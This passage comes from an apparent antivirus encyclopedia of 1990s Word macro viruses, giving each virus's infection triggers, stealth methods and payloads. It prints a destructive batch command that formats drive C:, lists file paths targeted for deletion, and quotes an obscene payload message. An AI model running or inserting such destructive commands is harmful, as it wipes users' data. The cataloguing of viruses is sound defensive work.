box has the following title: " Macro Get String " GreenStripe activates its destructive payload when an infected file is saved. It will replace the word "its" with "it is". This part of the virus does not always work. [WORD_Alliance] Virus name: WORD_Alliance Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 352 Bytes Place of origin: USA Date of origin: Summer 1996 Destructive: No Common In-The-Wild: No Description: Upon opening an infected document, Alliance will infect the global template (NORMAL.DOT). Further documents become infected when they are opened ("AutoOpen"). Alliance is only infectious on the: 2nd day of each month. 7th day of each month. 11th day of each month. 12th day of each month. Alliance adds the following comment to the File/Properties section: " You have been infected by the Alliance " [WORD_Alien.A] Virus name: WORD_Alien.A Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 7037 Bytes Place of origin: India Date of origin: November 1996 Payload: Yes Seen In-The-Wild: No Description: Alien infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened or closed. Before infection Alien checks for the string "Alien." If already present, Alien does not infect. The "ToolsCustomize" and "ToolsMacro" options are removed by Alien to make recognition of an infected file more difficult (called macro stealth technique). With a probability of 50 percent Alien displays the following message, on August 1st, and hides the "program manager" in Windows 3.x: " Another Year of Survival " Users are then unable to shut down Windows. Again with a probability of 50 percent Alien displays the following message: " It's Sunday & I intend to relax " Alien then tries to hide the "program manager" and terminate Microsoft Word without saving the active document. Alien also displays various messages: " You Fascinate Me. " " Look No Furhter... " " Hi Beautiful ! " " I'll Be Back ! " " Three Cheers For The Alien. Hip Hip Hooray ! " " Don't Believe the Hype ! " " Always Back Up Your Data. " " Don't Believe All Tips ! " " Never Trust An Alien ! " " Never Open Other Files ! " " The 'Alien' Virus Has Arrived ! " " The Alien Lives... " " Longer File Names Should Be Used. " [WORD_Alien.B] Virus name: WORD_Alien.B Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 7463 Bytes Place of origin: United States Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Alien.B infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened or closed. The "ToolsCustomize" and "ToolsMacro" options are removed by Alien.B to make recognition of an infected file more difficult (called macro stealth technique). The main difference between this new variant and the previous Alien.A virus is that Alien.B contains some corrupted code. For additional information, please refer to the Alien.A virus description. [WORD_Alien.C] Virus name: WORD_Alien.C Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 7463 Bytes Place of origin: United States Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Alien.C infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are opened or closed. The "ToolsCustomize" and "ToolsMacro" options are removed by Alien.C to make recognition of an infected file more difficult (called macro stealth technique). The main difference between this new variant and the previous Alien.A virus is that Alien.C contains some modified codes. For additional information, please refer to the Alien.A virus description. [WORD_Alien.D] Virus name: WORD_Alien.D Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 7463 Bytes Place of origin: UK Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Alien.D infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened or closed. The "ToolsCustomize" and "ToolsMacro" options are removed by Alien.D to make recognition of an infected file more difficult (called macro stealth technique). The main difference between this new variant and the previous Alien.B virus is that Alien.D contains a one byte corruption in its AutoOpen macro. For additional information, please refer to the Alien.A virus description. [WORD_Alien.E] Virus name: WORD_Alien.E Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 5061 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Alien.E infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened or closed. The "ToolsCustomize" and "ToolsMacro" options are removed by Alien.E to make recognition of an infected file more difficult (called macro stealth technique). The main difference between this new variant and previous Alien viruses is that Alien.E contains some modified codes. For additional information, please refer to the Alien.A virus description. [WORD_Alien.F] Virus name: WORD_Alien.F Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 8201 Bytes Place of origin: United States Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Alien.F infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened or closed. The "ToolsCustomize" and "ToolsMacro" options are removed by Alien.F to make recognition of an infected file more difficult (called macro stealth technique). The main difference between this new variant and previous Alien viruses is that Alien.F contains a corrupted "FileSaveAs" macro. For additional information, please refer to the Alien.A virus description. [WORD_Anak.A] Virus name: WORD_Anak.A Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: anakAE, AutoOpen,anakAO, anakSA, anakSMU, (AutoExec, FileSave) Size of macros: 5578 Bytes in documents 4737 Bytes in global template Place of origin: Indonesia Date of origin: March 1997 Payload: Yes Seen In-The-Wild: No Description: Anak infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (FileSave). Anak removes ToolsMacro, FileTemplates, and ToolsCustomize to make recognition of an infected document more difficult (called macro stealth technique). At the end of each month (starting on the 26th), Anak creates a new file and inserts the following text into it: " ...i n t r o d u c i n g...anakSMU Semarang, March 1997 " Anak also modifies the C:\AUTOEXEC.BAT file to add itself to the system registry: " @ECHO OFF " " REM --------------------------------------------------------- " " REM anakSMU wont destroy your REGEDIT, Just wanna be there :) " " REM email: anakSMU@TheOffice.net" " " REM --------------------------------------------------------- " The following message is displayed by Anak: " Yeah!, I wish I were anakSMU. " [WORD_Andry.A] Virus name: WORD_Andry.A Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 6896 Bytes Place of origin: Indonesia Date of origin: Spring 1997 Destructive: Yes Seen In-The-Wild: No Description: Andry.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). Andry hides FileTemplate, FormatStyle, ToolsCustomize, ToolsMacro, and ViewToolbars to make recognition of an infected document more difficult (called macro stealth technique). We advise not to use those menu items, since Andry attaches its viral macro to those commands. On March 1st, Andry encrypts infected documents with the following password: " Andry Christian " If you find a document with an unknown password, please download a copy of WinWord Password Recovery Tool (wwprt). It is available at: www.vdsarg.com. When a document is opened and the second field shows 1 or 3, Andry replaces all text with the following: " Hello...Andry Christian WordMacro Virus is Here...." Also on March 1st, Andry displays the following message and asks for user input: " HACKERS Labs '96 - Hackware Technology Research " " ANDRY [CHRISTIAN] WORD MACRO VIRUS IS HERE !!! " " DO YOU SUPPORT MY VIRUS ? " In case of a Yes, nothing happens. In case of a No, Andry overwrites the AUTOEXEC.BAT file and tries to format the hard disk. " @ECHO OFF " " CLS " " ECHO Please wait . . . " " FORMAT C: /U /C /S /AUTOTEST > NUL " The following comment can also be found in the virus code: "=====================================================================" " Source Code of Andry Christian WordMacro Virus 0.99 - _eta Release " "=====================================================================" " Virographer by Andry [Christian] in [Batavia] City, of INDONESIA " " Viroright (C) 1996-1999 Hackware Technology Research - HACKERS Labs." " Multi Platform, Multi Infector, Stealth, OneMacro, Encryption, etc " " Last Update by 01-Maret-1996 & 01:03 PM - Found Bugs...? Call Me " "=====================================================================" " HACKERS Labs. -> WE ARE A BIG FAMILY OF THE VIRUS CREATOR's TEAM " "=====================================================================" [WORD_Appder.A] Virus name: WORD_Appder.A (a.k.a.FunYour) Virus Type: Word macro virus Alias: WORD_NTTHNTA Number of Variants: 10 Number of macros: 2 or 3 Encrypted: No Macro names: Appder, AutoOpen, AutoClose Size of macros: 1912 Bytes in .doc files 1126 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: Appder infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed. Appder adds a "NTTHNTA=xx" value to the [Microsoft Word] section of winword6.ini and increases the value by one when infecting documents. Upon reaching a value of 20, Appder triggers its destructive payload and deletes the following files: C:\DOC\*.exe C:\DOC\*.com C:\WINDOWS\*.exe C:\WINDOWS\SYSTEM\*.TTF C:\WINDOWS\SYSTEM\*.FOT As a result, Windows will not work properly. [WORD8_Appder] Virus name: WORD8_Appder Virus Type: Word macro virus Alias: WORD_NTTHNTA Number of Variants: 10 Platform: Office 97 Number of macros: 2 or 3 Encrypted: No Macro names: Appder, AutoOpen, AutoClose Size of macros: 1912 Bytes in .doc files 1126 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: Appder infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed. Appder adds a "NTTHNTA=xx" value to the [Microsoft Word] section of winword6.ini and increases the value by one when infecting documents. Upon reaching a value of 20, Appder triggers its destructive payload and deletes the following files: C:\DOC\*.exe C:\DOC\*.com C:\WINDOWS\*.exe C:\WINDOWS\SYSTEM\*.TTF C:\WINDOWS\SYSTEM\*.FOT As a result, Windows will not work properly. [WORD_NTTHNTA] Virus name: WORD_NTTHNTA Virus Type: Word macro virus Alias: WORD_Appder.A Number of Variants: 10 Number of macros: 2 or 3 Encrypted: No Macro names: Appder, AutoOpen, AutoClose Size of macros: 1912 Bytes in .doc files 1126 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: NTTHNTA infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed. NTTHNTA adds an "NTTHNTA=xx" value to the [Microsoft Word] section of winword6.ini and increases the value by one when infecting documents. Upon reaching a value of 20, NTTHNTA triggers its destructive payload and deletes the following files: C:\DOC\*.exe C:\DOC\*.com C:\WINDOWS\*.exe C:\WINDOWS\SYSTEM\*.TTF C:\WINDOWS\SYSTEM\*.FOT As a result, Windows 3.x will not work properly. [WORD_Appder.B (a.k.a.FunYour)] Virus name: WORD_Appder.B (a.k.a.FunYour) Virus Type: Word macro virus Number of macros: 2 or 3 Encrypted: No Macro names: Appder, AutoOpen, AutoClose Size of macros: 1528 Bytes in documents 934 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: Yes Description: The difference between this new variant and the original Appder.A virus is that the payload has been deleted from the macro code. Therefore Appder.B does not delete any files. Appder.B infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). [WORD_Appder.C (a.k.a.FunYour)] Virus name: WORD_Appder.C (a.k.a.FunYour) Virus Type: Word macro virus Number of macros: 2 or 3 Encrypted: No Macro names: Appder, AutoOpen, AutoClose Size of macros: 1912 Bytes in .doc files 1126 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: The difference between this new variant and the original Appder.A virus is that Appder.C has a one byte code modification. Appder.C infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose). Appder.C adds a "NTTHNTA=xx" value to the [Microsoft Word] section of winword6.ini and increases the value by one when infecting documents. Upon reaching a value of 20, Appder.C triggers its destructive payload and deletes the following files: C:\DOC\*.exe C:\DOC\*.com C:\WINDOWS\*.exe C:\WINDOWS\SYSTEM\*.TTF C:\WINDOWS\SYSTEM\*.FOT As a result, Windows 3.x does not work properly. [WORD_Atom.A (a.k.a Atomic)] Virus name: WORD_Atom.A (a.k.a. Atomic) Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, FileOpen, FileSaveAs Size of macros: 1029 Bytes Place of origin: Ukraine Date of origin: February 1996 Destructive: Yes Common In-The-Wild: Yes Description: Atom infects the global template (Normal.dot) once an infected document is opened. Further documents become infected when a document is opened (FileOpen) or saved (FileSaveAs). When the "FileSaveAs" macro is called, Atom checks the system clock for a value of 13 in the seconds field. If this is the case, Atom adds the password "ATOM#1" to the saved document. The destructive payload inside "Atom" is activated on the 13th of each month. On this day, Atom deletes all the files inside the current directory. [WORD_Atom.B] Virus name: WORD_Atom.B Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, FileOpen, FileSaveAs Size of macros: 1053 Bytes Place of origin: Unknown Date of origin: December 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Atom.A virus is only minor. It does not affect the functionality of this new variant. For more information, please refer to the Atom.A virus description. [WORD_Atom.C] Virus name: WORD_Atom.C Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, FileOpen, FileSaveAs Size of macros: 1026 Bytes Place of origin: Unknown Date of origin: December 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Atom.A virus is only minor. It does not affect the functionality of this new variant. For more information, please refer to the Atom.A virus description. [WORD_Atom.D] Virus name: WORD_Atom.D Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, FileOpen, FileSaveAs Size of macros: 1024 Bytes Place of origin: Unknown Date of origin: December 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Atom.A virus is only minor. It does not affect the functionality of this new variant. For more information, please refer to the Atom.A virus description. [WORD_Atom.E] Virus name: WORD_Atom.E Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, FileOpen, FileSaveAs Size of macros: 1017 Bytes Place of origin: Unknown Date of origin: December 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Atom.A virus is only minor. It does not affect the functionality of this new variant. The programming error in Atom.A, which activates the payload on the 13th of each month, has been fixed in this new variant. Atom.E activates only on the 13th of December. For more information, please refer to the Atom.A virus description. [WORD_Atom.F] Virus name: WORD_Atom.F Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, FileOpen, FileSaveAs Size of macros: 1022 Bytes Place of origin: Unknown Date of origin: December 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Atom.A virus is only minor. It does not affect the functionality of this new variant. For more information, please refer to the Atom.A virus description. [WORD_Atom.G:De (a.k.a Atomic)] Virus name: WORD_Atom.G:De (a.k.a. Atomic) Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, DateiOeffnen, DateiSpeichernUnter Size of macros: 1120 Bytes Place of origin: Germany Date of origin: February 1996 Destructive: Yes Common In-The-Wild: No Description: Atom.G infects the global template (Normal.dot) once an infected document is opened. Further documents become infected when a document is opened (DateiOeffnen) or saved (DateiSpeichernUnter). When the "DateiSpeichernUnter" macro is called, Atom.G checks the system clock for a value of 13 in the seconds field. If this is the case, Atom.G adds the password "ATOM#1" to the saved document. The destructive payload inside "Atom" is activated on the 13th of December. On this day, Atom.G deletes all the files inside the current directory. Atom.G only works with the German version of Microsoft Word, since it uses language specific macros. [WORD_Atom.H (a.k.a Adultsex)] Virus name: WORD_Atom.H (a.k.a. Adultsex) Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: Atom, AutoOpen, FileOpen, FileSaveAs Size of macros: 1302 Bytes Place of origin: Unknown Date of origin: February 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Atom.A virus is that the payload has been changed in this new variant. Instead of deleting files, Atom.H displays the following message when opening documents: "KISS ME FUCK ME LOVE ME BITCH SUCK MY DICK ADULT SEX !! I LOVE SEX DRUGS CLASS A DRUGS YEAH MAN ! I ASK YOU MY DARLING FOR ANAL SEX GIVE IT TO ME ! EVER DANCED WITH THE DEVIL ON THE MOONLIGHT ? PREY FOR YOUR CUNT YOU SEXY HORNEY BITCH" The password, which is added to a saved document, was also changed from "ATOM#1" to "ADULTSEX#1." For more information, please refer to the Atom.A virus description. [WORD_Attack.A] Virus name: WORD_Attack.A Virus Type: Word macro virus Number of macros: 8 Encrypted: Yes Macro names: AutoOpen, Active, Attack, FileOpen, FileSaveAs, InActive, Organizer, ToolsMacro Size of macros: 8201 Bytes Place of origin: UK Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Attack.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (FileOpen) or saved (FileSaveAs). Attack uses ToolsMacro to make recognition of an infected document more difficult (called macro stealth technique). Attack has various payloads: 1. It deletes files. 2. It changes file attributes to hidden. 3. It replaces text with the following: " This is Microsoft Bang!**Virus**--- " 4. It sets the following password to saved documents: " Virii " If you find a document with an unknown password, please download a copy of the WinWord Password Recovery Tool (wwprt). It is available at: www.vdsarg.com. [WORD_Badboy.A] Virus name: WORD_Badboy.A Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: BadBoy, FileNew, AutoExec, AutoOpen, FileSaveAs Size of macros: 1873 Bytes Place of origin: Unknown Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: Badboy infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved with the "FileSaveAs" command. When an infected file is opened on the 1st and 13th of each month (normal.dot is already infected), Badboy displays the following message and then sets the " gangsta " password to the active document: " Bad Boy BadBoy, What u gonna do " " What u gonna do when they come for you " " The Gangsta owns you ! " " Have a happy new year ! " Badboy also changes the File Summary info to the following: " Author = Kenny-G sux " " Keywords = Gangsta Rappa " " Comments = The Mutha mix " To make recognition of an infected file more difficult Badboy removes the Tools/Macro, Tools/Customize and File/Templates menus (called macro stealth technique). [WORD_Bandung.A (a.k.a. Jakarta)] Virus name: WORD_Bandung.A (a.k.a. Jakarta) Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs Toolsmacro, Toolscustomize Size of macros: 4262 Bytes Place of origin: Bandung, Indonesia Date of origin: August/September 1996 Destructive: Yes Seen In-The-Wild: Yes Description: Bandung infects the global template (Normal.dot) when an infected document is opened. Further documents are infected with the "FileSave" and "FileSaveAs" commands. Bandung uses macro stealth techniques to hide itself. It uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). The destructive payload activates when Microsoft Word is started. It checks the date and time and in case of a date later than the 19th of each month and a time after 11:00 am, Bandung deletes all files in all directories. An exception to this are the files located in the following directories: C:\WINDOWS C:\WINWORD C:\WINWORD6 After the file deletion, Bandung creates the file C:\PESAN.TXT. The file contains some Indonesian text telling the user (translated to English): " You are unlucky, all files on this machine have been deleted, " " except for WINDOWS and WINWORD, don't panic, this is " " not your fault, but this the result of my work......Whoever " " is able to find a way to combat this virus, I will give the " " virus listing to you!!!! And of course I will constantly " " return to greet you with my new viruses .....good luck ! " " Bandung Monday, June 28 1996, 13:00 pm " Another payload replaces the letter "a" with "#@." This occurs when the "ToolsCustomize" macro is called. Bandung also displays some WordBasic error messages. [WORD_Bandung.B] Virus name: WORD_Bandung.B Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs Toolsmacro, Toolscustomize Size of macros: 4262 Bytes Place of origin: Bandung, Indonesia Date of origin: August/September 1996 Destructive: No Seen In-The-Wild: No Description: The difference between this new variant and the original Bandung.A virus is that the AutoExec, ToolsMacro and ToolsCustomize macros are corrupted. Due to the corruption, Bandung.B does not activate its destructive payload. Instead of the payload activation, it displays various error messages. Bandung.B is still able to infect the global template and further documents. Bandung uses "Toolsmacro" to make recognition of an infected file more difficult (called macro stealth technique). [WORD_Bandung.C] Virus name: WORD_Bandung.C Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs, Toolsmacro, Toolscustomize Size of macros: 5428 Bytes Place of origin: Bandung, Indonesia Date of origin: December 1996 Payload: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Bandung.A virus is that the "AutoExec" macro was replaced with the corrupted "AutoOpen" macro from the Rapi virus. The payload replaces the letter "a" with "#@." This occurs when the "ToolsCustomize" macro is called. Bandung.C uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). Due to the new macro code, Bandung.C displays a syntax error message whenever Microsoft Word is started. [WORD_Bandung.D] Virus name: WORD_Bandung.D Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs, Toolsmacro, Toolscustomize Size of macros: 4262 Bytes Place of origin: Bandung, Indonesia Date of origin: December 1996 Destructive: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Bandung.A virus is that the "AutoExec" macro is corrupted. Even though there is a corruption in the "AutoExec" macro, Bandung.D still activates its destructive payload when Microsoft Word is started. Another payload replaces the letter "a" with "#@." This occurs when the "ToolsCustomize" macro is called. Bandung.D uses macro stealth technique to hide itself. It uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). Due to its macro corruption, Bandung.D displays some error messages. For more information, please refer to the Bandung.A virus description. [WORD_Bandung.E] Virus name: WORD_Bandung.E Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs, Toolsmacro, Toolscustomize Size of macros: 4262 Bytes Place of origin: Bandung, Indonesia Date of origin: January 1997 Payload: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Bandung.A virus is that the "AutoExec" macro is corrupted. The payload replaces the letter "a" with "#@." This occurs when the "ToolsCustomize" macro is called. Bandung.E uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). Due to its macro corruption, Bandung.E never executes its destructive payload. Instead it displays the following Wordbasic error message: " Out of Memory " [WORD_Bandung.G] Virus name: WORD_Bandung.G Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs, ToolsMacro, ToolsCustomize Size of macros: 1990 Bytes Place of origin: Bandung, Indonesia Date of origin: January 1997 Payload: Yes Seen In-The-Wild: No Description: The only difference between this new variant and the original Bandung.A virus is the "AutoExec" macro. Bandung.G contains only two lines. One line is empty and one contains a "DisableAutoMacros" statement. The payload replaces the letter "a" with "#@." This occurs when the "ToolsCustomize" macro is called. Bandung.G does not have the destructive payload from the original Bandung.A virus. [WORD_Bandung.I] Virus name: WORD_Bandung.I Virus Type: Word macro virus Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs, ToolsMacro, ToolsCustomize Size of macros: 1988 Bytes Place of origin: Bandung, Indonesia Date of origin: February 1997 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and the original Bandung.A virus is the "AutoExec" macro. Bandung.I contains only three lines from an anti-virus solution, which disables all the automacros. Bandung.I does not have the destructive payload from the original Bandung.A virus. For more information, please refer to the Bandung.A virus. [WORD_Bertik.A] Virus name: WORD_Bertik.A Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: XXXAO, XXXFS, XXXFSA, Payload, AutoOpen (YYYAO, FileSave, FileSaveAs) Size of macros: 2988 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: Yes Description: Bertik.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen) or saved (FileSave and FileSaveAs). Bertik is not destructive, it only copies the WINWORD.HLP file to the templates directory. This happens whenever Bertik infects a new document. During the process of copying, WINWORD.HLP is renamed to number.WRD, where "number" increments with each infection. Due to the size of WINWORD.HLP, Bertik can fill up the hard drive space. After a Bertik infection, the templates directory should be checked for "*.WRD" files. Bertik also displays the following message when reaching a full hard drive: " !!!Made by virus Bertik 1 !!! " [Word_Birthday.A:De (a.k.a. PCW)] Virus name: Word_Birthday.A:De (a.k.a. PCW) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen, DateiSpeichernUnter Size of macros: 1039 Bytes Place of origin: German computer magazine Date of origin: July 1996 Destructive: No Common In-The-Wild: No Description: Birthday infects the global template (normal.dot) when an infected document is opened. Further documents become infected when the "DateiSpeichernUnter" command is used. It displays the following message: " Happy Birthday! Herzlichen Glⁿckwunsch... " [WORD_Boom.A:De (a.k.a. Boombastic)] Virus name: WORD_Boom.A:De (a.k.a. Boombastic) Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: AutoExec, AutoOpen, DateiSpeichernUnter, System Size of macros: 2863 Bytes Place of origin: Germany Date of origin: July 1996 Payload: Yes Common In-The-Wild: Yes Description: Boom is the second macro virus written for the German version of Microsoft Word. Boom's destructive payload renames the menu structure of Word to: Datei -> Mr.Boombastic Bearbeiten -> and Ansicht -> Sir WIXALOT Einfuegen -> are Format -> watching Extras -> you Tabelle -> ! Fenster -> ! Hilfe -> ! A sound is send to the PC speaker during the renaming process. After the menu change, Boom will create a new global template and insert the following text: " Greetings from Mr. Boombastic and Sir WIXALOT !!! " " Oskar L., wir kriegen dich!!! " "Dies ist eine Initiative des Institutes zur Vermeidung und Verbreitung von " " Peinlichkeiten, durch in der Oeffentlichkeit stehende Personen, unter der " " Schirmherrschaft von Rudi S. ! " Boom prints this text. [WORD_Box.B] Virus name: WORD_Box.B Virus Type: Word macro virus Number of macros: 7 Encrypted: Yes Macro names: Box, Dead, AutoOpen, AutoClose, FilePrint, FilePrintDefault, ToolsMacro Size of macros: 1988 Bytes Place of origin: Taiwan Date of origin: February 1997 Destructive: Yes Seen In-The-Wild: No Description: Box.B infects the global template and further documents when an infected document is opened (AutoOpen) or closed (AutoClose). Box.B uses "ToolsMacro" to make recognition of an infected file more difficult (called macro stealth technique). Box.B consists of several destructive payloads. One payload formats the C:\ drive, another one drops the Dos-based virus "One Half.3544". A third payload displays the following messages and adds it to printed documents: " Taiwan Super No. 1 Macro Virus " " Twno1-S " " Today is my Birthday " Box.B only works with the Chinese version of Microsoft Word. [WORD_Buero.A (a.k.a Bureau, BuroNeu)] Virus name: WORD_Buero.A (a.k.a Bureau, BuroNeu) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen (DateiSpeichern), BueroNeu Size of macros: 697 Bytes Place of origin: Germany Date of origin: August 1996 Destructive: Yes Common In-The-Wild: Yes Description: Buero is another macro virus written for the German version of Microsoft Word. Buero infects the global template (Normal.dot) when an infected document is opened. Further documents become infected with the "DateiSpeichern" (only in the global template) command. After August 15, 1996, Buero renames the system file "IO.SYS" to "IIO.SYS." This action will leave the computer unbootable. The second destructive payload searches for C:\*.DOC files and deletes them. [WORD_Cap.a] Virus name: WORD_Cap.a Virus Type: Word macro virus Number of macros: differs Encrypted: Yes Macro names: CAP Size of macros: differs Place of origin: Unknown Date of origin: December 1996 Destructive: No Common In-The-Wild: Yes Description: Cap.A is another complex macro virus that is able to spread on various localized versions of Microsoft WORD_ While some macros keep the same name, others are automatically assigned new names from the localized version of Word. When Cap.A infects the global template, it deletes all existing macros. It infects the global template when an infected document is opened. Cap.A uses "ToolsMacro" and "FileTemplates" to make recognition of an infected document more difficult (called macro stealth technique). [WORD_Cebu.A] Virus name: WORD_Cebu.A Virus Type: Word macro virus Number of macros: 4 or more Encrypted: Yes Macro names: AutoOpen, AutoClose, AutoExec, MSRun Size of macros: 1237 Bytes Place of origin: Hong Kong Date of origin: Spring 1997 Destructive: Yes Seen In-The-Wild: No Description: Cebu infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen) or closed (AutoClose). When Cebu triggers (probability of 59/60), it replaces the word " Asian " with the Word " Cebu ". This happens when Microsoft Word is started (AutoExec) and sixty-four minutes later (new probability: 2/15). Cebu is one of the very few macro viruses that copies user macros, therefore it can exist with 4 or more macros. We recommend that you de-install the macro anti-virus solutions (such as Scanprot) in order to prevent Cebu from snatching macros. [WORD_Cebu.B] Virus name: WORD_Cebu.B Virus Type: Word macro virus Number of macros: 4 or more Encrypted: Yes Macro names: AutoOpen, AutoClose, AutoExec, MSRun Size of macros: 1976 Bytes Place of origin: Unknown Date of origin: May 1997 Destructive: Yes Seen In-The-Wild: No Description: Cebu.B infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen) or closed (AutoClose). The main difference between this new variant and the previous Cebu.A virus is that Cebu.B has some modified codes and also contains various bugs. For more information, please refer to the Cebu.A virus description. [WORD_Chaos.A] Virus name: WORD_Chaos.A Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: FileOpen (TempFileOpen), FileSave (TempFileSave), AutoExec (TempAutoExec), TempAutoOpen (AutoOpen) Size of macros: 2810 Place of origin: Unknown Date of origin: June, 1996 Destructive: Yes Seen In-The-Wild: No Description: Chaos infects the global template when an infected file is opened. Further documents become infected when they opened (FileOpen) or saved (FileSave). Upon starting Word (AutoExec), Chaos puts the following text string on the status bar: (users will recognize a delay) " number/500 " When the random number on the left side reaches 500, Chaos tries to halt the computer. [WORD_Clock.A:De (a.k.a Extra)] Virus name: WORD_Clock.A:De (a.k.a Extra) Virus Type: Word macro virus Number of macros: 11 Encrypted: Yes Macro names: Action, AutoExec, AutoOpen, Extrasmakro, DateiSchliessen, Datumunduhrzeit, DateiDokVorlagen, Dateiallesspeichern, Oeffnen, Speichern Size of macros: 3795 Bytes Place of origin: USA Date of origin: Summer 1996 Payload: Yes Common In-The-Wild: No Description: Clock is another macro virus written for the German version of Microsoft Word. It uses "ExtrasMakro" and "DateiDokVorlagen" to make recognition of an infected document more difficult (called macro stealth technique). When an infected document is opened after the 26th of each month, Clock will display a window containing the time. It will also activate one of its payloads, which sets the system clock to a value of 33 in the seconds field. Clock does this every 2 to 3 minutes, which results to a less accurate system clock. The second payload will start in 1997. Clock will check the system clock, and in case of a minute value smaller than 5, it will flip the "FileOpen" and "FileSave" macros. This will only happen on: 1st of each month 2nd of each month 13th of each month 21st of each month 27th of each month [WORD_Colors.A (a.k.a Rainbow)] Virus name: WORD_Colors.A (a.k.a Rainbow) Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileSave, FileSaveAs, macros, ToolsMacro Size of macros: 6470 Bytes Place of origin: Portugal Date of origin: Posted to Usenet in October 1995 Payload: Yes Common In-The-Wild: Yes Description: Colors is the first macro virus that can still infect, even when all the Auto-macros 